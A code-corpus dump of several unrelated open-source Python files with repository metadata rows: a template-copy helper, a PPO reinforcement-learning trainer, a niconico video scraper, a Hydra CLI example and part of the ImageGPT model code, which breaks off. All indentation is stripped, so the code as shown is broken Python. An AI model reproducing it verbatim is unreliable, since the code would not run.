fp_new = open(path_new, 'w')
fp_new.write(fp_old.read().replace('{{ %s_name }}' % app_or_project, name).replace('{{ %s_name }}' % other, other_name))
fp_old.close()
fp_new.close()
try:
shutil.copymode(path_old, path_new)
_make_writeable(path_new)
except OSError:
sys.stderr.write(style.NOTICE("Notice: Couldn't set permission bits on %s. You're probably using an uncommon filesystem setup. No problem.\n" % path_new))
def _make_writeable(filename):
"""
Make sure that the file is writeable. Useful if our source is
read-only.
"""
import stat
if sys.platform.startswith('java'):
# On Jython there is no os.access()
return
if not os.access(filename, os.W_OK):
st = os.stat(filename)
new_permissions = stat.S_IMODE(st.st_mode) | stat.S_IWUSR
os.chmod(filename, new_permissions)
| 39.081019
| 178
| 0.612687
|
4a18c2789e86932058f18c6c23eadc714139935f
| 16,684
|
py
|
Python
|
spinup/algos/pytorch/ppo/ppo.py
|
RamiSketcher/spinningupMPAC
|
543a3587ef88cd098ec2f060f183d0f9969e92e3
|
[
"MIT"
] | null | null | null |
spinup/algos/pytorch/ppo/ppo.py
|
RamiSketcher/spinningupMPAC
|
543a3587ef88cd098ec2f060f183d0f9969e92e3
|
[
"MIT"
] | null | null | null |
spinup/algos/pytorch/ppo/ppo.py
|
RamiSketcher/spinningupMPAC
|
543a3587ef88cd098ec2f060f183d0f9969e92e3
|
[
"MIT"
] | null | null | null |
import numpy as np
import torch
from torch.optim import Adam
import gym
import time
import spinup.algos.pytorch.ppo.core as core
from spinup.utils.logx import EpochLogger
from spinup.utils.mpi_pytorch import setup_pytorch_for_mpi, sync_params, mpi_avg_grads
from spinup.utils.mpi_tools import mpi_fork, mpi_avg, proc_id, mpi_statistics_scalar, num_procs
from spinup.pddm_envs.gym_env import GymEnv
class PPOBuffer:
"""
A buffer for storing trajectories experienced by a PPO agent interacting
with the environment, and using Generalized Advantage Estimation (GAE-Lambda)
for calculating the advantages of state-action pairs.
"""
def __init__(self, obs_dim, act_dim, size, gamma=0.99, lam=0.95):
self.obs_buf = np.zeros(core.combined_shape(size, obs_dim), dtype=np.float32)
self.act_buf = np.zeros(core.combined_shape(size, act_dim), dtype=np.float32)
self.adv_buf = np.zeros(size, dtype=np.float32)
self.rew_buf = np.zeros(size, dtype=np.float32)
self.ret_buf = np.zeros(size, dtype=np.float32)
self.val_buf = np.zeros(size, dtype=np.float32)
self.logp_buf = np.zeros(size, dtype=np.float32)
self.gamma, self.lam = gamma, lam
self.ptr, self.path_start_idx, self.max_size = 0, 0, size
def store(self, obs, act, rew, val, logp):
"""
Append one timestep of agent-environment interaction to the buffer.
"""
assert self.ptr < self.max_size # buffer has to have room so you can store
self.obs_buf[self.ptr] = obs
self.act_buf[self.ptr] = act
self.rew_buf[self.ptr] = rew
self.val_buf[self.ptr] = val
self.logp_buf[self.ptr] = logp
self.ptr += 1
def finish_path(self, last_val=0):
"""
Call this at the end of a trajectory, or when one gets cut off
by an epoch ending. This looks back in the buffer to where the
trajectory started, and uses rewards and value estimates from
the whole trajectory to compute advantage estimates with GAE-Lambda,
as well as compute the rewards-to-go for each state, to use as
the targets for the value function.
The "last_val" argument should be 0 if the trajectory ended
because the agent reached a terminal state (died), and otherwise
should be V(s_T), the value function estimated for the last state.
This allows us to bootstrap the reward-to-go calculation to account
for timesteps beyond the arbitrary episode horizon (or epoch cutoff).
"""
path_slice = slice(self.path_start_idx, self.ptr)
rews = np.append(self.rew_buf[path_slice], last_val)
vals = np.append(self.val_buf[path_slice], last_val)
# the next two lines implement GAE-Lambda advantage calculation
deltas = rews[:-1] + self.gamma * vals[1:] - vals[:-1]
self.adv_buf[path_slice] = core.discount_cumsum(deltas, self.gamma * self.lam)
# the next line computes rewards-to-go, to be targets for the value function
self.ret_buf[path_slice] = core.discount_cumsum(rews, self.gamma)[:-1]
self.path_start_idx = self.ptr
def get(self):
"""
Call this at the end of an epoch to get all of the data from
the buffer, with advantages appropriately normalized (shifted to have
mean zero and std one). Also, resets some pointers in the buffer.
"""
assert self.ptr == self.max_size # buffer has to be full before you can get
self.ptr, self.path_start_idx = 0, 0
# the next two lines implement the advantage normalization trick
adv_mean, adv_std = mpi_statistics_scalar(self.adv_buf)
self.adv_buf = (self.adv_buf - adv_mean) / adv_std
data = dict(obs=self.obs_buf, act=self.act_buf, ret=self.ret_buf,
adv=self.adv_buf, logp=self.logp_buf)
return {k: torch.as_tensor(v, dtype=torch.float32) for k,v in data.items()}
def ppo(env_fn, actor_critic=core.MLPActorCritic, ac_kwargs=dict(), seed=0,
steps_per_epoch=4000, epochs=125, gamma=0.99, clip_ratio=0.2, pi_lr=3e-4,
vf_lr=1e-3, train_pi_iters=80, train_v_iters=80, lam=0.97, max_ep_len=70,
target_kl=0.01, logger_kwargs=dict(), save_freq=10):
"""
Proximal Policy Optimization (by clipping),
with early stopping based on approximate KL
Args:
env_fn : A function which creates a copy of the environment.
The environment must satisfy the OpenAI Gym API.
actor_critic: The constructor method for a PyTorch Module with a
``step`` method, an ``act`` method, a ``pi`` module, and a ``v``
module. The ``step`` method should accept a batch of observations
and return:
=========== ================ ======================================
Symbol Shape Description
=========== ================ ======================================
``a`` (batch, act_dim) | Numpy array of actions for each
| observation.
``v`` (batch,) | Numpy array of value estimates
| for the provided observations.
``logp_a`` (batch,) | Numpy array of log probs for the
| actions in ``a``.
=========== ================ ======================================
The ``act`` method behaves the same as ``step`` but only returns ``a``.
The ``pi`` module's forward call should accept a batch of
observations and optionally a batch of actions, and return:
=========== ================ ======================================
Symbol Shape Description
=========== ================ ======================================
``pi`` N/A | Torch Distribution object, containing
| a batch of distributions describing
| the policy for the provided observations.
``logp_a`` (batch,) | Optional (only returned if batch of
| actions is given). Tensor containing
| the log probability, according to
| the policy, of the provided actions.
| If actions not given, will contain
| ``None``.
=========== ================ ======================================
The ``v`` module's forward call should accept a batch of observations
and return:
=========== ================ ======================================
Symbol Shape Description
=========== ================ ======================================
``v`` (batch,) | Tensor containing the value estimates
| for the provided observations. (Critical:
| make sure to flatten this!)
=========== ================ ======================================
ac_kwargs (dict): Any kwargs appropriate for the ActorCritic object
you provided to PPO.
seed (int): Seed for random number generators.
steps_per_epoch (int): Number of steps of interaction (state-action pairs)
for the agent and the environment in each epoch.
epochs (int): Number of epochs of interaction (equivalent to
number of policy updates) to perform.
gamma (float): Discount factor. (Always between 0 and 1.)
clip_ratio (float): Hyperparameter for clipping in the policy objective.
Roughly: how far can the new policy go from the old policy while
still profiting (improving the objective function)? The new policy
can still go farther than the clip_ratio says, but it doesn't help
on the objective anymore. (Usually small, 0.1 to 0.3.) Typically
denoted by :math:`\epsilon`.
pi_lr (float): Learning rate for policy optimizer.
vf_lr (float): Learning rate for value function optimizer.
train_pi_iters (int): Maximum number of gradient descent steps to take
on policy loss per epoch. (Early stopping may cause optimizer
to take fewer than this.)
train_v_iters (int): Number of gradient descent steps to take on
value function per epoch.
lam (float): Lambda for GAE-Lambda. (Always between 0 and 1,
close to 1.)
max_ep_len (int): Maximum length of trajectory / episode / rollout.
target_kl (float): Roughly what KL divergence we think is appropriate
between new and old policies after an update. This will get used
for early stopping. (Usually small, 0.01 or 0.05.)
logger_kwargs (dict): Keyword args for EpochLogger.
save_freq (int): How often (in terms of gap between epochs) to save
the current policy and value function.
"""
# Special function to avoid certain slowdowns from PyTorch + MPI combo.
setup_pytorch_for_mpi()
# Set up logger and save configuration
logger = EpochLogger(**logger_kwargs)
logger.save_config(locals())
# Random seed
seed += 10000 * proc_id()
torch.manual_seed(seed)
np.random.seed(seed)
# Instantiate environment
env = env_fn()
obs_dim = env.observation_space.shape
act_dim = env.action_space.shape
# Create actor-critic module
ac = actor_critic(env.observation_space, env.action_space, **ac_kwargs)
# Sync params across processes
sync_params(ac)
# Count variables
var_counts = tuple(core.count_vars(module) for module in [ac.pi, ac.v])
logger.log('\nNumber of parameters: \t pi: %d, \t v: %d\n'%var_counts)
# Set up experience buffer
local_steps_per_epoch = int(steps_per_epoch / num_procs())
buf = PPOBuffer(obs_dim, act_dim, local_steps_per_epoch, gamma, lam)
# Set up function for computing PPO policy loss
def compute_loss_pi(data):
obs, act, adv, logp_old = data['obs'], data['act'], data['adv'], data['logp']
# Policy loss
pi, logp = ac.pi(obs, act)
ratio = torch.exp(logp - logp_old)
clip_adv = torch.clamp(ratio, 1-clip_ratio, 1+clip_ratio) * adv
loss_pi = -(torch.min(ratio * adv, clip_adv)).mean()
# Useful extra info
approx_kl = (logp_old - logp).mean().item()
ent = pi.entropy().mean().item()
clipped = ratio.gt(1+clip_ratio) | ratio.lt(1-clip_ratio)
clipfrac = torch.as_tensor(clipped, dtype=torch.float32).mean().item()
pi_info = dict(kl=approx_kl, ent=ent, cf=clipfrac)
return loss_pi, pi_info
# Set up function for computing value loss
def compute_loss_v(data):
obs, ret = data['obs'], data['ret']
return ((ac.v(obs) - ret)**2).mean()
# Set up optimizers for policy and value function
pi_optimizer = Adam(ac.pi.parameters(), lr=pi_lr)
vf_optimizer = Adam(ac.v.parameters(), lr=vf_lr)
# Set up model saving
logger.setup_pytorch_saver(ac)
def update():
data = buf.get()
pi_l_old, pi_info_old = compute_loss_pi(data)
pi_l_old = pi_l_old.item()
v_l_old = compute_loss_v(data).item()
# Train policy with multiple steps of gradient descent
for i in range(train_pi_iters):
pi_optimizer.zero_grad()
loss_pi, pi_info = compute_loss_pi(data)
kl = mpi_avg(pi_info['kl'])
if kl > 1.5 * target_kl:
logger.log('Early stopping at step %d due to reaching max kl.'%i)
break
loss_pi.backward()
mpi_avg_grads(ac.pi) # average grads across MPI processes
pi_optimizer.step()
logger.store(StopIter=i)
# Value function learning
for i in range(train_v_iters):
vf_optimizer.zero_grad()
loss_v = compute_loss_v(data)
loss_v.backward()
mpi_avg_grads(ac.v) # average grads across MPI processes
vf_optimizer.step()
# Log changes from update
kl, ent, cf = pi_info['kl'], pi_info_old['ent'], pi_info['cf']
logger.store(LossPi=pi_l_old, LossV=v_l_old,
KL=kl, Entropy=ent, ClipFrac=cf,
DeltaLossPi=(loss_pi.item() - pi_l_old),
DeltaLossV=(loss_v.item() - v_l_old))
# Prepare for interaction with environment
start_time = time.time()
o, ep_ret, ep_len, score = env.reset(), 0, 0, 0
# Main loop: collect experience in env and update/log each epoch
for epoch in range(epochs):
for t in range(local_steps_per_epoch):
a, v, logp = ac.step(torch.as_tensor(o, dtype=torch.float32))
next_o, r, d, info = env.step(a)
ep_ret += r
ep_len += 1
score += info['score'] # Gaffar
# save and log
buf.store(o, a, r, v, logp)
logger.store(VVals=v)
# Update obs (critical!)
o = next_o
timeout = ep_len == max_ep_len
terminal = d or timeout
epoch_ended = t==local_steps_per_epoch-1
if terminal or epoch_ended:
if epoch_ended and not(terminal):
print('Warning: trajectory cut off by epoch at %d steps.'%ep_len, flush=True)
# if trajectory didn't reach terminal state, bootstrap value target
if timeout or epoch_ended:
_, v, _ = ac.step(torch.as_tensor(o, dtype=torch.float32))
else:
v = 0
buf.finish_path(v)
if terminal:
# only save EpRet / EpLen if trajectory finished
logger.store(EpRet=ep_ret, EpLen=ep_len)
logger.store(Score=score) # Gaffar
o, ep_ret, ep_len = env.reset(), 0, 0
# Save model
if (epoch % save_freq == 0) or (epoch == epochs-1):
logger.save_state({'env': env}, None)
# Perform PPO update!
update()
# Log info about epoch
logger.log_tabular('Epoch', epoch)
logger.log_tabular('EpRet', with_min_and_max=True)
logger.log_tabular('EpLen', average_only=True)
logger.log_tabular('Score', average_only=True) # Gaffar
logger.log_tabular('VVals', with_min_and_max=True)
logger.log_tabular('TotalEnvInteracts', (epoch+1)*steps_per_epoch)
logger.log_tabular('LossPi', average_only=True)
logger.log_tabular('LossV', average_only=True)
logger.log_tabular('DeltaLossPi', average_only=True)
logger.log_tabular('DeltaLossV', average_only=True)
logger.log_tabular('Entropy', average_only=True)
logger.log_tabular('KL', average_only=True)
logger.log_tabular('ClipFrac', average_only=True)
logger.log_tabular('StopIter', average_only=True)
logger.log_tabular('Time', time.time()-start_time)
logger.dump_tabular()
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
# parser.add_argument('--env', type=str, default='HalfCheetah-v2')
parser.add_argument('--env', type=str, default='pddm_cheetah-v0')
parser.add_argument('--hid', type=int, default=64)
parser.add_argument('--l', type=int, default=2)
parser.add_argument('--gamma', type=float, default=0.99)
parser.add_argument('--seed', '-s', type=int, default=0)
parser.add_argument('--cpu', type=int, default=4)
parser.add_argument('--steps', type=int, default=4000)
parser.add_argument('--epochs', type=int, default=50)
parser.add_argument('--exp_name', type=str, default='ppo')
args = parser.parse_args()
mpi_fork(args.cpu) # run parallel code with mpi
from spinup.utils.run_utils import setup_logger_kwargs
logger_kwargs = setup_logger_kwargs(args.exp_name, args.seed)
ppo(lambda : gym.make(args.env), actor_critic=core.MLPActorCritic,
ac_kwargs=dict(hidden_sizes=[args.hid]*args.l), gamma=args.gamma,
seed=args.seed, steps_per_epoch=args.steps, epochs=args.epochs,
logger_kwargs=logger_kwargs)
| 43.447917
| 97
| 0.585291
|
4a18c2add19cbe96301956526083004fc5a3fcb6
| 1,779
|
py
|
Python
|
niconico/video.py
|
tuna2134/niconico.py
|
0c06fb25a25599a1eabffe471e1fcf7a399236ac
|
[
"MIT"
] | null | null | null |
niconico/video.py
|
tuna2134/niconico.py
|
0c06fb25a25599a1eabffe471e1fcf7a399236ac
|
[
"MIT"
] | null | null | null |
niconico/video.py
|
tuna2134/niconico.py
|
0c06fb25a25599a1eabffe471e1fcf7a399236ac
|
[
"MIT"
] | null | null | null |
# niconico.py - Video
from typing import TYPE_CHECKING, NoReturn, Union
from threading import Thread
from bs4 import BeautifulSoup
from .base import DictFromAttribute, BaseClient
from .exceptions import ExtractFailed
from .headers import Headers, VIDEO
from ._json import loads, dumps
from .types.video import EasyComment, Tag, Video as VideoType
class Video(DictFromAttribute):
if TYPE_CHECKING:
easyComment: EasyComment
tag: Tag
video: VideoType
def __init__(self, client: "Client", url: str, data: dict):
self.client, self.url, self.data = client, url, data
super().__init__(self.data)
def get_download_link(self):
...
def _heartbeat(self):
...
class Client(BaseClient):
def get_video(self, url: str, headers: Headers = VIDEO) -> Union[Video, NoReturn]:
"""Get video data from Nico Nico Video.
Parameters
----------
headers : Headers, default VIDEO
Headers to be used when making a request.
Returns
-------
data : dict
Video data
Raises
------
ExtractFailed"""
if "nico.ms" in url:
url = url.replace("nico.ms/", "www.nicovideo.jp/watch/")
if "sp" in url:
url = url.replace("sp", "www")
data = BeautifulSoup(
self.client.request(
"get", url, headers=headers, cookies=self.cookies
).text, "html.parser"
).find(
"div", {"id": "js-initial-watch-data"}
).get("data-api-data")
video = Video(self, url, data)
if data:
video.data = loads(data)
return video
else:
raise ExtractFailed("ニコニコ動画から情報を取得するのに失敗しました。")
| 25.414286
| 86
| 0.583474
|
4a18c3fc38981d3d69c8288058cc5de6bef2eb81
| 527
|
py
|
Python
|
dsproject/{{cookiecutter.project_slug}}/scripts/example.py
|
timothyb0912/cookiecutters
|
dbe386d7e30cd66886562d779ca83a880788337a
|
[
"MIT"
] | null | null | null |
dsproject/{{cookiecutter.project_slug}}/scripts/example.py
|
timothyb0912/cookiecutters
|
dbe386d7e30cd66886562d779ca83a880788337a
|
[
"MIT"
] | 2
|
2021-01-30T17:11:41.000Z
|
2021-03-14T22:54:05.000Z
|
dsproject/{{cookiecutter.project_slug}}/scripts/example.py
|
timothyb0912/cookiecutters
|
dbe386d7e30cd66886562d779ca83a880788337a
|
[
"MIT"
] | null | null | null |
"""
Example CLI for {{cookiecutter.project_name}}.
"""
import hydra
import pyprojroot
from omegaconf import DictConfig
default_config_path = str(pyprojroot.here("configs"))
default_config_name = "config"
@hydra.main(config_path=default_config_path, config_name=default_config_name)
def main(cfg: DictConfig):
"""
Hello world CLI.
Returns True if function exited successfully.
"""
print(f"Hello World!\n Default model is {cfg.model_name_default}")
return True
if __name__ == '__main__':
main()
| 21.08
| 77
| 0.732448
|
4a18c64a13dd22573f7669e850dd589b1a21b704
| 53,649
|
py
|
Python
|
src/transformers/models/imagegpt/modeling_imagegpt.py
|
JingyaHuang/transformers
|
6589e510fa4e6c442059de2fab84752535de9b23
|
[
"Apache-2.0"
] | null | null | null |
src/transformers/models/imagegpt/modeling_imagegpt.py
|
JingyaHuang/transformers
|
6589e510fa4e6c442059de2fab84752535de9b23
|
[
"Apache-2.0"
] | null | null | null |
src/transformers/models/imagegpt/modeling_imagegpt.py
|
JingyaHuang/transformers
|
6589e510fa4e6c442059de2fab84752535de9b23
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# Copyright 2021 The OpenAI Team Authors and HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""PyTorch OpenAI ImageGPT model."""
import math
import os
import warnings
from typing import Any, Optional, Tuple, Union
import torch
import torch.utils.checkpoint
from packaging import version
from torch import nn
from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss
if version.parse(torch.__version__) >= version.parse("1.6"):
is_amp_available = True
from torch.cuda.amp import autocast
else:
is_amp_available = False
from ...activations import ACT2FN
from ...modeling_outputs import (
BaseModelOutputWithPastAndCrossAttentions,
CausalLMOutputWithCrossAttentions,
SequenceClassifierOutputWithPast,
)
from ...modeling_utils import PreTrainedModel
from ...pytorch_utils import Conv1D, find_pruneable_heads_and_indices, prune_conv1d_layer
from ...utils import add_start_docstrings, add_start_docstrings_to_model_forward, logging, replace_return_docstrings
from .configuration_imagegpt import ImageGPTConfig
logger = logging.get_logger(__name__)
_CHECKPOINT_FOR_DOC = "openai/imagegpt-small"
_CONFIG_FOR_DOC = "ImageGPTConfig"
_TOKENIZER_FOR_DOC = "ImageGPTTokenizer"
IMAGEGPT_PRETRAINED_MODEL_ARCHIVE_LIST = [
"openai/imagegpt-small",
"openai/imagegpt-medium",
"openai/imagegpt-large",
# See all Image GPT models at https://huggingface.co/models?filter=imagegpt
]
def load_tf_weights_in_imagegpt(model, config, imagegpt_checkpoint_path):
"""
Load tf checkpoints in a pytorch model
"""
try:
import re
import tensorflow as tf
except ImportError:
logger.error(
"Loading a TensorFlow model in PyTorch, requires TensorFlow to be installed. Please see "
"https://www.tensorflow.org/install/ for installation instructions."
)
raise
tf_path = os.path.abspath(imagegpt_checkpoint_path)
logger.info("Converting TensorFlow checkpoint from {}".format(tf_path))
# Load weights from TF model
init_vars = tf.train.list_variables(tf_path)
names = []
arrays = []
for name, shape in init_vars:
logger.info("Loading TF weight {} with shape {}".format(name, shape))
array = tf.train.load_variable(tf_path, name)
names.append(name)
arrays.append(array.squeeze())
for name, array in zip(names, arrays):
name = name[6:] # skip "model/"
name = name.split("/")
# adam_v and adam_m are variables used in AdamWeightDecayOptimizer to calculated m and v
# which are not required for using pretrained model
if any(
n in ["adam_v", "adam_m", "AdamWeightDecayOptimizer", "AdamWeightDecayOptimizer_1", "global_step"]
for n in name
) or name[-1] in ["_step"]:
logger.info("Skipping {}".format("/".join(name)))
continue
pointer = model
if name[-1] not in ["wtet"]:
pointer = getattr(pointer, "transformer")
for m_name in name:
if re.fullmatch(r"[A-Za-z]+\d+", m_name):
scope_names = re.split(r"(\d+)", m_name)
else:
scope_names = [m_name]
if scope_names[0] == "w" or scope_names[0] == "g":
pointer = getattr(pointer, "weight")
elif scope_names[0] == "b":
pointer = getattr(pointer, "bias")
elif scope_names[0] == "wpe" or scope_names[0] == "wte":
pointer = getattr(pointer, scope_names[0])
pointer = getattr(pointer, "weight")
elif scope_names[0] in ["q_proj", "k_proj", "v_proj"]:
pointer = getattr(pointer, "c_attn")
pointer = getattr(pointer, "weight")
elif len(name) == 3 and name[1] == "attn" and scope_names[0] == "c_proj":
pointer = getattr(pointer, scope_names[0])
pointer = getattr(pointer, "weight")
elif scope_names[0] == "wtet":
pointer = getattr(pointer, "lm_head")
pointer = getattr(pointer, "weight")
elif scope_names[0] == "sos":
pointer = getattr(pointer, "wte")
pointer = getattr(pointer, "weight")
else:
pointer = getattr(pointer, scope_names[0])
if len(scope_names) >= 2:
num = int(scope_names[1])
pointer = pointer[num]
if len(name) > 1 and name[1] == "attn" or name[-1] == "wtet" or name[-1] == "sos" or name[-1] == "wte":
pass # array is used to initialize only part of the pointer so sizes won't match
else:
try:
assert pointer.shape == array.shape
except AssertionError as e:
e.args += (pointer.shape, array.shape)
raise
logger.info("Initialize PyTorch weight {}".format(name))
if name[-1] == "q_proj":
pointer.data[:, : config.n_embd] = torch.from_numpy(array.reshape(config.n_embd, config.n_embd)).T
elif name[-1] == "k_proj":
pointer.data[:, config.n_embd : 2 * config.n_embd] = torch.from_numpy(
array.reshape(config.n_embd, config.n_embd)
).T
elif name[-1] == "v_proj":
pointer.data[:, 2 * config.n_embd :] = torch.from_numpy(array.reshape(config.n_embd, config.n_embd)).T
elif len(name) == 3 and name[1] == "attn" and name[2] == "c_proj":
pointer.data = torch.from_numpy(array.reshape(config.n_embd, config.n_embd))
elif name[-1] == "wtet":
pointer.data = torch.from_numpy(array)
elif name[-1] == "wte":
pointer.data[: config.vocab_size - 1, :] = torch.from_numpy(array)
elif name[-1] == "sos":
pointer.data[-1] = torch.from_numpy(array)
else:
pointer.data = torch.from_numpy(array)
return model
class ImageGPTLayerNorm(nn.Module):
def __init__(self, hidden_size: Tuple[int], eps: float = 1e-5):
super().__init__()
self.eps = eps
self.weight = nn.Parameter(torch.Tensor(hidden_size))
def forward(self, tensor: torch.Tensor) -> tuple:
# input is not mean centered
return (
tensor
/ torch.sqrt(torch.mean(torch.square(tensor), axis=-1, keepdim=True) + self.eps)
* self.weight.data[..., :]
)
class ImageGPTAttention(nn.Module):
def __init__(self, config, is_cross_attention: Optional[bool] = False, layer_idx: Optional[int] = None):
super().__init__()
max_positions = config.max_position_embeddings
self.register_buffer(
"bias",
torch.tril(torch.ones((max_positions, max_positions), dtype=torch.uint8)).view(
1, 1, max_positions, max_positions
),
)
self.register_buffer("masked_bias", torch.tensor(-1e4))
self.embed_dim = config.hidden_size
self.num_heads = config.num_attention_heads
self.head_dim = self.embed_dim // self.num_heads
self.split_size = self.embed_dim
if self.head_dim * self.num_heads != self.embed_dim:
raise ValueError(
f"`embed_dim` must be divisible by num_heads (got `embed_dim`: {self.embed_dim} and `num_heads`:"
f" {self.num_heads})."
)
self.scale_attn_weights = config.scale_attn_weights
self.is_cross_attention = is_cross_attention
# Layer-wise attention scaling, reordering, and upcasting
self.scale_attn_by_inverse_layer_idx = config.scale_attn_by_inverse_layer_idx
self.layer_idx = layer_idx
self.reorder_and_upcast_attn = config.reorder_and_upcast_attn
if self.is_cross_attention:
self.c_attn = Conv1D(2 * self.embed_dim, self.embed_dim)
self.q_attn = Conv1D(self.embed_dim, self.embed_dim)
else:
self.c_attn = Conv1D(3 * self.embed_dim, self.embed_dim)
self.c_proj = Conv1D(self.embed_dim, self.embed_dim)
self.attn_dropout = nn.Dropout(config.attn_pdrop)
self.resid_dropout = nn.Dropout(config.resid_pdrop)
self.pruned_heads = set()
def prune_heads(self, heads):
if len(heads) == 0:
return
heads, index = find_pruneable_heads_and_indices(heads, self.num_heads, self.head_dim, self.pruned_heads)
index_attn = torch.cat([index, index + self.split_size, index + (2 * self.split_size)])
# Prune conv1d layers
self.c_attn = prune_conv1d_layer(self.c_attn, index_attn, dim=1)
self.c_proj = prune_conv1d_layer(self.c_proj, index, dim=0)
# Update hyper params
self.split_size = (self.split_size // self.num_heads) * (self.num_heads - len(heads))
self.num_heads = self.num_heads - len(heads)
self.pruned_heads = self.pruned_heads.union(heads)
def _attn(self, query, key, value, attention_mask=None, head_mask=None):
attn_weights = torch.matmul(query, key.transpose(-1, -2))
if self.scale_attn_weights:
attn_weights = attn_weights / (float(value.size(-1)) ** 0.5)
# Layer-wise attention scaling
if self.scale_attn_by_inverse_layer_idx:
attn_weights = attn_weights / float(self.layer_idx + 1)
if not self.is_cross_attention:
# if only "normal" attention layer implements causal mask
query_length, key_length = query.size(-2), key.size(-2)
causal_mask = self.bias[:, :, key_length - query_length : key_length, :key_length].bool()
attn_weights = torch.where(causal_mask, attn_weights, self.masked_bias.to(attn_weights.dtype))
if attention_mask is not None:
# Apply the attention mask
attn_weights = attn_weights + attention_mask
attn_weights = nn.Softmax(dim=-1)(attn_weights)
# Downcast (if necessary) back to V's dtype (if in mixed-precision) -- No-Op otherwise
attn_weights = attn_weights.type(value.dtype)
attn_weights = self.attn_dropout(attn_weights)
# Mask heads if we want to
if head_mask is not None:
attn_weights = attn_weights * head_mask
attn_output = torch.matmul(attn_weights, value)
return attn_output, attn_weights
def _upcast_and_reordered_attn(self, query, key, value, attention_mask=None, head_mask=None):
# Use `torch.baddbmm` (a bit more efficient w/ alpha param for scaling -- from Megatron-LM)
bsz, num_heads, q_seq_len, dk = query.size()
_, _, k_seq_len, _ = key.size()
# Preallocate attn_weights for `baddbmm`
attn_weights = torch.empty(bsz * num_heads, q_seq_len, k_seq_len, dtype=torch.float32, device=query.device)
# Compute Scale Factor
scale_factor = 1.0
if self.scale_attn_weights:
scale_factor /= float(value.size(-1)) ** 0.5
if self.scale_attn_by_inverse_layer_idx:
scale_factor /= float(self.layer_idx + 1)
# Upcast (turn off autocast) and reorder (Scale K by 1 / root(dk))
if is_amp_available:
with autocast(enabled=False):
q, k = query.reshape(-1, q_seq_len, dk), key.transpose(-1, -2).reshape(-1, dk, k_seq_len)
attn_weights = torch.baddbmm(attn_weights, q.float(), k.float(), beta=0, alpha=scale_factor)
attn_weights = attn_weights.reshape(bsz, num_heads, q_seq_len, k_seq_len)
else:
q, k = query.reshape(-1, q_seq_len, dk), key.transpose(-1, -2).reshape(-1, dk, k_seq_len)
attn_weights = torch.baddbmm(attn_weights, q.float(), k.float(), beta=0, alpha=scale_factor)
attn_weights = attn_weights.reshape(bsz, num_heads, q_seq_len, k_seq_len)
if not self.is_cross_attention:
# if only "normal" attention layer implements causal mask
query_length, key_length = query.size(-2), key.size(-2)
causal_mask = self.bias[:, :, key_length - query_length : key_length, :key_length].bool()
attn_weights = torch.where(causal_mask, attn_weights, self.masked_bias.to(attn_weights.dtype))
if attention_mask is not None:
# Apply the attention mask
attn_weights = attn_weights + attention_mask
attn_weights = nn.Softmax(dim=-1)(attn_weights)
# Downcast (if necessary) back to V's dtype (if in mixed-precision) -- No-Op if otherwise
if attn_weights.dtype != torch.float32:
raise RuntimeError("Error with upcasting, attn_weights does not have dtype torch.float32")
attn_weights = attn_weights.type(value.dtype)
attn_weights = self.attn_dropout(attn_weights)
# Mask heads if we want to
if head_mask is not None:
attn_weights = attn_weights * head_mask
attn_output = torch.matmul(attn_weights, value)
return attn_output, attn_weights
def _split_heads(self, tensor, num_heads, attn_head_size):
"""
Splits hidden_size dim into attn_head_size and num_heads
"""
new_shape = tensor.size()[:-1] + (num_heads, attn_head_size)
tensor = tensor.view(*new_shape)
return tensor.permute(0, 2, 1, 3) # (batch, head, seq_length, head_features)
def _merge_heads(self, tensor, num_heads, attn_head_size):
"""
Merges attn_head_size dim and num_attn_heads dim into hidden_size
"""
tensor = tensor.permute(0, 2, 1, 3).contiguous()
new_shape = tensor.size()[:-2] + (num_heads * attn_head_size,)
return tensor.view(new_shape)
def forward(
self,
hidden_states: torch.Tensor,
layer_past: Optional[bool] = None,
attention_mask: Optional[torch.Tensor] = None,
head_mask: Optional[torch.Tensor] = None,
encoder_hidden_states: Optional[torch.Tensor] = None,
encoder_attention_mask: Optional[torch.Tensor] = None,
use_cache: Optional[bool] = False,
output_attentions: Optional[bool] = False,
) -> tuple:
if encoder_hidden_states is not None:
if not hasattr(self, "q_attn"):
raise ValueError(
"If class is used as cross attention, the weights `q_attn` have to be defined. "
"Please make sure to instantiate class with `ImageGPTAttention(..., is_cross_attention=True)`."
)
query = self.q_attn(hidden_states)
key, value = self.c_attn(encoder_hidden_states).split(self.split_size, dim=2)
attention_mask = encoder_attention_mask
else:
query, key, value = self.c_attn(hidden_states).split(self.split_size, dim=2)
query = self._split_heads(query, self.num_heads, self.head_dim)
key = self._split_heads(key, self.num_heads, self.head_dim)
value = self._split_heads(value, self.num_heads, self.head_dim)
if layer_past is not None:
past_key, past_value = layer_past
key = torch.cat((past_key, key), dim=-2)
value = torch.cat((past_value, value), dim=-2)
if use_cache is True:
present = (key, value)
else:
present = None
if self.reorder_and_upcast_attn:
attn_output, attn_weights = self._upcast_and_reordered_attn(query, key, value, attention_mask, head_mask)
else:
attn_output, attn_weights = self._attn(query, key, value, attention_mask, head_mask)
attn_output = self._merge_heads(attn_output, self.num_heads, self.head_dim)
attn_output = self.c_proj(attn_output)
attn_output = self.resid_dropout(attn_output)
outputs = (attn_output, present)
if output_attentions:
outputs += (attn_weights,)
return outputs # a, present, (attentions)
class ImageGPTMLP(nn.Module):
def __init__(self, intermediate_size, config):
super().__init__()
embed_dim = config.hidden_size
self.c_fc = Conv1D(intermediate_size, embed_dim)
self.c_proj = Conv1D(embed_dim, intermediate_size)
self.act = ACT2FN[config.activation_function]
self.dropout = nn.Dropout(config.resid_pdrop)
def forward(self, hidden_states: torch.Tensor) -> torch.Tensor:
hidden_states = self.c_fc(hidden_states)
hidden_states = self.act(hidden_states)
hidden_states = self.c_proj(hidden_states)
hidden_states = self.dropout(hidden_states)
return hidden_states
class ImageGPTBlock(nn.Module):
def __init__(self, config, layer_idx=None):
super().__init__()
hidden_size = config.hidden_size
inner_dim = config.n_inner if config.n_inner is not None else 4 * hidden_size
self.ln_1 = ImageGPTLayerNorm(hidden_size, eps=config.layer_norm_epsilon)
